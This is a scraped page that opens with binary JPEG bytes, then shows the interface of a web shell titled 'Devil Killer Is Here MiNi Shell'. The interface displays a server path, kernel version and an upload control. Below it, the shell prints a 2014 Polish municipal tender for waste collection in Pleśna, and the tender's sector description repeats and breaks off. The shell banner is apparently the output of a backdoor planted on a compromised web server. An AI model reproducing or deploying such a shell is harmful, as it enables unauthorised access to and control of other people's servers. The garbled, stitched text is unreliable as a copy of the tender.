JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140408/119396-N-2014.html

<p class="kh_header"><b>Pleśna: Świadczenie usług wywozu i zagospodarowania odpadów komunalnych z terenu gminy Pleśna</b><br>
<b>Numer ogłoszenia: 119396 - 2014; data zamieszczenia: 08.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Pleśna , Pleśna 240, 33-171 Pleśna, woj. małopolskie, tel. 014 6798170, faks 014 6798947.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.plesna</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług wywozu i zagospodarowania odpadów komunalnych z terenu gminy Pleśna.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług wywozu i zagospodarowania odpadów komunalnych                     z terenu Gminy Pleśna, z nieruchomości, na których zamieszkują mieszkańcy.

Przedmiot zamówienia podzielony został na dwie części:

część I obejmującą odbieranie i zagospodarowanie odpadów z sektora A, który obejmuje następujące miejscowości: Rzuchowa, Szczepanowice, Dąbrówka Szczepanowska, Lubinka, Janowice. 
Ilość mieszkańców w sektorze: ok. 5441, ilość budynków mieszkalnych: ok. 1325,

część II obejmującą odbieranie i zagospodarowanie odpadów z sektora B, następujące miejscowości: Pleśna, Łowczówek, Świebodzin, Rychwałd, Lichwin, Woźniczna. 
Ilość mieszkańców w sektorze: ok. 6583 osób, ilość budynków mieszkalnych: ok. 1573.

Wywóz odpadów obejmuje:
1.	Niesegregowane (zmieszane ) odpady komunalne kod 20 03 01 
Właściciele nieruchomości zamieszkałych - odpady komunalne gromadzone będą w pojemnikach                          o pojemności 120 l. Pojemniki zapewni Wykonawca i ustawi je w miejscach wskazanych przez właścicieli nieruchomości. 
Odbieranie odpadów komunalnych od właścicieli posesji zamieszkałych odbywać się będzie co dwa tygodnie zgodnie z harmonogramem wywozu.

2.	Selektywnie zbierane odpady komunalne kod 20 01 01, 20 01 02,  20 01 39, 20 01 40,  20 02 01, 15 01 01, 15 01 02, 15 01 03, 15 01 04, 15 01 05, 15 01 06, 15 01 07, 16 01 03

Właściciele nieruchomości zamieszkałych selektywna zbiórka odpadów komunalnych realizować będą                  w systemie workowym i pojemnikowym:
1)	W systemie workowym wprowadza się 4 rodzaje worków:
- żółty - tworzywa sztuczne, opakowania wielomateriałowe, metal,
- niebieski - papier, 
- czarny - odpady biodegradowalne,
- zielony - szkło, 
Worki zapewni Wykonawca. Grubość worków powinna być tak dobrana, aby zapewnić ich szczelność. Worki muszą być opatrzone nadrukiem na jaki rodzaj odpadu są przeznaczone. Dodatkowo na worku muszą widnieć adres i dane kontaktowe Wykonawcy.
Wywóz odpadów komunalnych selektywnie gromadzonych w workach bezpośrednio od mieszkańców - 1 raz w miesiącu, na podstawie harmonogramu wywozu, z zastrzeżeniem, że zbiórka odpadów biodegradowalnych odbywała się będzie nie rzadziej niż 2 razy w miesiącu. 
Wykonawca sprawdza, rzetelność segregacji odpadów przez gospodarstwa domowe - wyrywkowo. W przypadku stwierdzenia nieprawidłowości Wykonawca niezwłocznie powiadamia Zamawiającego.
Wykonawca przedłoży odrębny harmonogram wywozu odpadów biodegradowalnych.

2)	System pojemnikowy polegał będzie na gromadzeniu odpadów w pojemnikach typu dzwon ustawionych w każdej miejscowości na szkło, papier, metal oraz pojemników siatkowych na tworzywa sztuczne, odpady wielomateriałowe. Pojemniki zapewni Zamawiający. 
Wywóz na zlecenie telefoniczne, jednak nie rzadziej niż raz na 2  miesiące. 

Szacowana ilość wywozów z pojemników z sektora A 225 razy.
Szacowana ilość wywozów z pojemników z sektora B 270 razy.

3.	odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny- 20 03 07, 20 01 36, 20 01 23*, 20 01 35*
Sektor A
Zbiórka odpadów wielkogabarytowych oraz sprzętu elektrycznego i elektronicznego  odbywała się będzie w dwojaki sposób:
a) zbiórka stacjonarna w kontenerach typu KP 7 o poj. 7 m3, ustawionych w niżej wymienionych punktach zbierania odpadów,  na odpady wielkogabarytowe. 
- Rzuchowa - działka nr 94/2 (obok szkoły) - 1 kontener
- Janowice - działka nr 734/1 (obok szkoły) - 1 kontener
- Szczepanowice - działka nr 712 (obok boiska) - 1 kontener
b)	raz w roku (w miesiącu marzec) zbiórka na zasadzie wystawki sprzed posesji.  
Ilość wywozów 54 razy.

Sektor B
Zbiórka odpadów wielkogabarytowych oraz zużytego sprzętu elektrycznego i elektronicznego  odbywała się będzie w dwojaki sposób:
a) zbiórka stacjonarna w kontenerach typu KP 7 o poj. 7 m3, ustawionych w niżej wymienionych miejscach,  na odpady wielkogabarytowe. 
- Pleśna - działka nr 246/1 (teren dawnej oczyszczalni typu KOS) - 1 kontener
- Lichwin - działka nr 581/1 (obok szkoły) - 1 kontener
b) raz w roku (w miesiącu marzec) zbiórka na zasadzie wystawki sprzed posesji.  
Ilość wywozów  36 razy.

Kontenery dla poszczególnych sektorów zapewni Zamawiający. Zamawiający wskazuje miejsce lokalizacji kontenerów, a ich organizacja,  utrzymanie oraz obsługa leży po stronie Wykonawcy  warunki jakie musi spełniać punkt zbierania odpadów określone są w Rozporządzeniu Ministra Gospodarki i Pracy z dnia                        4 sierpnia 2004 r. w sprawie szczegółowego sposobu postępowania z olejami odpadowymi ( Dz. U. z 2004 r. Nr 192, poz. 1968). 
Ilość wywozu w trakcie obowiązywania umowy w każdym z sektorów po 36 razy. 
Usługa wykonywana będzie zgodnie z harmonogramem dostarczonym przez Wykonawcę.

4.	20 01 32, leki inne niż wymienione w 20 01 31
Usługa wywozu dla sektora A odbywać się będzie z Punktu Aptecznego w Janowicach z częstotliwością raz na kwartał.
Usługa wywozu dla sektora B odbywać się będzie z Apteki Arnika ( na przeciwko Urzędu Gminy) z częstotliwością raz na kwartał.

5.	Przewidywana ilość wszelkich odpadów w ciągu 1,5 roku:
1)	dla sektora A:
a)	odpady segregowane -  250 Mg,
b)	odpady niesegregowane -    700 Mg.

2)	dla sektora B:
a)	odpady segregowane -  300 Mg,
b)	odpady niesegregowane -   830 Mg.

Ilości wywożonych odpadów podana w Części III SIZW mogą ulec zmianie w czasie obowiązywania umowy w granicach +/-5% zaokrąglonej do pełnej liczby. Z tytułu różnicy w  ilości wywożonych odpadów Zamawiający nie będzie ponosił dodatkowych kosztów. 
Wykonawca jest zobowiązany dotrzeć do osób wytwarzających odpady i zebrać wszystkie wystawione odpady.
Wykonawca ma obowiązek realizować niniejszą usługę zgodnie z przepisami ustawy z dnia 13 września            1996 r. o utrzymaniu czystości i porządku w gminach (tekst jednolity Dz.U. z 2012 r. poz. 391 ze zmianami). 
Niesegregowane odpady komunalne, pozostałości z sortowania odpadów komunalnych musi  być poddane odzyskowi lub unieszkodliwieniu na obszarze województwa małopolskiego w instalacjach regionalnych wskazanych w Wojewódzkim Planie Gospodarki Odpadami.
Wykonawca będzie dostarczał Zamawiającemu raz na kwartał sprawozdania z ilości zebranych i zagospodarowanych odpadów. Termin złożenia sprawozdania oraz jego forma muszą spełniać wymagania rozporządzenia Ministra Środowiska z dnia 15 maja 2012r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz. U. z 2012 r. poz. 630).

Wspólny Słownik Zamówień (CPV)
90510000-5 Usuwanie i obróbka odpadów
90511000-2    Usługi wywozu odpadów
90513100-7    Usługi wywozu odpadów pochodzących z gospodarstw domowych.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.00.00-5, 90.51.10.00-2, 90.51.31.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli Wykonawca udokumentuje posiadanie  wpisu do rejestru działalności regulowanej, o którym mowa w art. 9b ust. 2 ustawy z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach (Dz. U. z 2012 r. poz. 391 ze zmianami) prowadzonego przez Wójta Gminy Pleśna w zakresie:
Kod odpadu	Rodzaje odpadów
15 01 01	Opakowania z papieru i tektury
15 01 02	Opakowania z tworzyw sztucznych
15 01 04	Opakowania z metali
15 01 05	Opakowania wielomateriałowe
15 01 06	Zmieszane odpady opakowaniowe
15 01 07	Opakowania ze szkła
16 01 03	Zużyte opony
17 01 07	Odpady gruzu i betonu
20 01 01	Makulatura
20 01 02	Szkło
20 01 23*	Urządzenia zawierające freony
20 01 32	Leki inne niż wymienione w 20 01 31
20 01 35*	Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 i 20 01 23 zawierające niebezpieczne składniki
20 01 36	Zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 i 20 01 35
20 01 39	Tworzywa sztuczne
20 01 40	Metale
20 03 01	Niesegregowane (zmieszane) odpady komunalne
20 03 07	Odpady wielkogabarytowe
20 03 99 	Odpady komunalne niewymienione w innych podgrupach</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że Wykonawca spełnia warunek posiadania wiedzy i doświadczenia zapewniającego wykonanie zamówienia, jeżeli Wykonawca wykaże wykonanie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanie, głównych usług  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, polegające na odbiorze odpadów komunalnych segregowanych i niesegregowanych, w sposób ciągły przez okres minimum 12 miesięcy, o łącznej masie:
Część I - 300Mg
Część II - 300Mg
Zamawiający uzna za dokument potwierdzający należyte wykonanie usługi m. in. dokumenty potwierdzające odbiór odpadów komunalnych np. sprawozdanie M-09 o wywozie i  unieszkodliwianiu odpadów, sprawozdanie G-06 potwierdzające obrót surowcami wtórnymi</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (wzór zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.
Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia (wzór zał. nr 2 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę co najmniej 200 000,00 PLN dla, każdej z części zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zamawiający wymaga, aby Wykonawca zawarł z nim umowę na warunkach określonych we wzorze umowy ( załącznik nr 6 do SIWZ).
2.	Zmiany postanowień zawartej umowy wymaga formy pisemnej  w postaci aneksu pod rygorem nieważności. Zmiany nie mogą naruszać postanowień zawartych w art. 144 ustawy Pzp.
3.	Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonał wyboru Wykonawcy, w zakresie przesunięcia terminu wykonania robót w przypadku:
1)	wystąpienia szczególnie niesprzyjających warunków atmosferycznych, których nie można było wcześniej przewidzieć, uniemożliwiających wykonanie przedmiotowego zamówienia zgodnie z technologią ( temperatura, opady) na wniosek Wykonawcy.
2)	działania siły wyższej mającej wpływ na termin wykonania zamówienia, (np. działanie sił przyrody huragan, powódź, pożar, stan wojenny, stan wyjątkowy itp.).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.plesna.pl/przetargi.htm; lub www.malopolska.pl/bip/plesna<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Pleśna, 33-171 Pleśna 240, pok. nr14, bezpłatnie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.04.2014 godzina 10:00, miejsce: Oferty należy składać w Urzędzie Gminy w Pleśnej 33-171 Pleśna 240  pok. 9 - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> obejmującą odbieranie i zagospodarowanie odpadów z sektora A.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> część I obejmującą odbieranie i zagospodarowanie odpadów z sektora A, który obejmuje następujące miejscowości: Rzuchowa, Szczepanowice, Dąbrówka Szczepanowska, Lubinka, Janowice. 
Ilość mieszkańców w sektorze: ok. 5441, ilość budynków mieszkalnych: ok. 1325,
Wywóz odpadów obejmuje:
1.	Niesegregowane (zmieszane ) odpady komunalne kod 20 03 01 
Właściciele nieruchomości zamieszkałych - odpady komunalne gromadzone będą w pojemnikach                          o pojemności 120 l. Pojemniki zapewni Wykonawca i ustawi je w miejscach wskazanych przez właścicieli nieruchomości. 
Odbieranie odpadów komunalnych od właścicieli posesji zamieszkałych odbywać się będzie co dwa tygodnie zgodnie z harmonogramem wywozu.

2.	Selektywnie zbierane odpady komunalne kod 20 01 01, 20 01 02,  20 01 39, 20 01 40,  20 02 01, 15 01 01, 15 01 02, 15 01 03, 15 01 04, 15 01 05, 15 01 06, 15 01 07, 16 01 03

Właściciele nieruchomości zamieszkałych selektywna zbiórka odpadów komunalnych realizować będą                  w systemie workowym i pojemnikowym:
1)	W systemie workowym wprowadza się 4 rodzaje worków:
- żółty - tworzywa sztuczne, opakowania wielomateriałowe, metal,
- niebieski - papier, 
- czarny - odpady biodegradowalne,
- zielony - szkło, 
Worki zapewni Wykonawca. Grubość worków powinna być tak dobrana, aby zapewnić ich szczelność. Worki muszą być opatrzone nadrukiem na jaki rodzaj odpadu są przeznaczone. Dodatkowo na worku muszą widnieć adres i dane kontaktowe Wykonawcy.
Wywóz odpadów komunalnych selektywnie gromadzonych w workach bezpośrednio od mieszkańców - 1 raz w miesiącu, na podstawie harmonogramu wywozu, z zastrzeżeniem, że zbiórka odpadów biodegradowalnych odbywała się będzie nie rzadziej niż 2 razy w miesiącu. 
Wykonawca sprawdza, rzetelność segregacji odpadów przez gospodarstwa domowe - wyrywkowo. W przypadku stwierdzenia nieprawidłowości Wykonawca niezwłocznie powiadamia Zamawiającego.
Wykonawca przedłoży odrębny harmonogram wywozu odpadów biodegradowalnych.

2)	System pojemnikowy polegał będzie na gromadzeniu odpadów w pojemnikach typu dzwon ustawionych w każdej miejscowości na szkło, papier, metal oraz pojemników siatkowych na tworzywa sztuczne, odpady wielomateriałowe. Pojemniki zapewni Zamawiający. 
Wywóz na zlecenie telefoniczne, jednak nie rzadziej niż raz na 2  miesiące. 

Szacowana ilość wywozów z pojemników z sektora A 225 razy.
Szacowana ilość wywozów z pojemników z sektora B 270 razy.

3.	odpady wielkogabarytowe, zużyty sprzęt elektryczny i elektroniczny- 20 03 07, 20 01 36, 20 01 23*, 20 01 35*
Sektor A
Zbiórka odpadów wielkogabarytowych oraz sprzętu elektrycznego i elektronicznego  odbywała się będzie w dwojaki sposób:
a) zbiórka stacjonarna w kontenerach typu KP 7 o poj. 7 m3, ustawionych w niżej wymienionych punktach zbierania odpadów,  na odpady wielkogabarytowe. 
- Rzuchowa - działka nr 94/2 (obok szkoły) - 1 kontener
- Janowice - działka nr 734/1 (obok szkoły) - 1 kontener
- Szczepanowice - działka nr 712 (obok boiska) - 1 kontener
b)	raz w roku (w miesiącu marzec) zbiórka na zasadzie wystawki sprzed posesji.  
Ilość wywozów 54 razy.

Kontenery dla poszczególnych sektorów zapewni Zamawiający. Zamawiający wskazuje miejsce lokalizacji kontenerów, a ich organizacja,  utrzymanie oraz obsługa leży po stronie Wykonawcy  warunki jakie musi spełniać punkt zbierania odpadów określone są w Rozporządzeniu Ministra Gospodarki i Pracy z dnia                        4 sierpnia 2004 r. w sprawie szczegółowego sposobu postępowania z olejami odpadowymi ( Dz. U. z 2004 r. Nr 192, poz. 1968). 
Ilość wywozu w trakcie obowiązywania umowy w każdym z sektorów po 36 razy. 
Usługa wykonywana będzie zgodnie z harmonogramem dostarczonym przez Wykonawcę.

4.	20 01 32, leki inne niż wymienione w 20 01 31
Usługa wywozu dla sektora A odbywać się będzie z Punktu Aptecznego w Janowicach z częstotliwością raz na kwartał.
Usługa wywozu dla sektora B odbywać się będzie z Apteki Arnika ( na przeciwko Urzędu Gminy) z częstotliwością raz na kwartał.

5.	Przewidywana ilość wszelkich odpadów w ciągu 1,5 roku:
1)	dla sektora A:
a)	odpady segregowane -  250 Mg,
b)	odpady niesegregowane -    700 Mg.

Ilości wywożonych odpadów podana w Części III SIZW mogą ulec zmianie w czasie obowiązywania umowy w granicach +/-5% zaokrąglonej do pełnej liczby. Z tytułu różnicy w  ilości wywożonych odpadów Zamawiający nie będzie ponosił dodatkowych kosztów. 
